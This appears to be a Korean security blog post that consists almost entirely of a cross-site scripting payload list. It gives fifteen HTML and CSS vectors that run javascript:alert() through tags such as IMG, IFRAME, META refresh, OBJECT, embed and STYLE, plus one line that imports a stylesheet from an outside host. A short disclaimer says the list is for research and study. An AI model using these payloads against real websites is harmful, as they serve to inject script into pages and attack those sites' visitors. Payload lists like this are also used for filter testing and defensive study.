<STYLE>@import 'javascript:alert("xss1")';</STYLE>
<IMG SRC=javascript:alert('XSS2')>
<BODY BACKGROUND="javascript:alert('XSS3')">
<LINK REL="stylesheet" HREF="javascript:alert('XSS4');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS5');">
<IFRAME SRC="javascript:alert('XSS6');"></IFRAME>
<DIV STYLE="background-image: url(javascript:alert('XSS7'))">
<STYLE>.XSS{background-image:url("javascript:alert('XSS8')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS9')")}</STYLE>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS10')></OBJECT>
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<script SRC="javascript:alert('xss11');"></script>
<video SRC="javascript:alert('xss12');"</video>
<LAYER SRC="javascript:alert('xss13')"></LAYER>
<embed src="javascript:alert('xss14')" type="application/x-shockwave-flash" allowscriptaccess="always" width="0" height="0"></embed>
<applet src="javascript:alert('xss15')" type=text/html>
[출처] 불분명..
[주의] 본 자료는 연구용 및 학습 자료로 사용하길 바라며, 악의적인 사용시 사용자 본인에게 책임이 있음을 명시합니다.
'위험한_친구들 > 십자군_XSS' 카테고리의 다른 글
| XSS in Skype for iOS (0) | 2011.09.21 |
|---|---|
| Cookiejacking (0) | 2011.09.15 |
| Fake Facebook friend request email leads to malware (0) | 2011.09.05 |
| XSSed project (0) | 2011.08.31 |
| HTML Code Injection and Cross-site scripting (0) | 2011.08.31 |
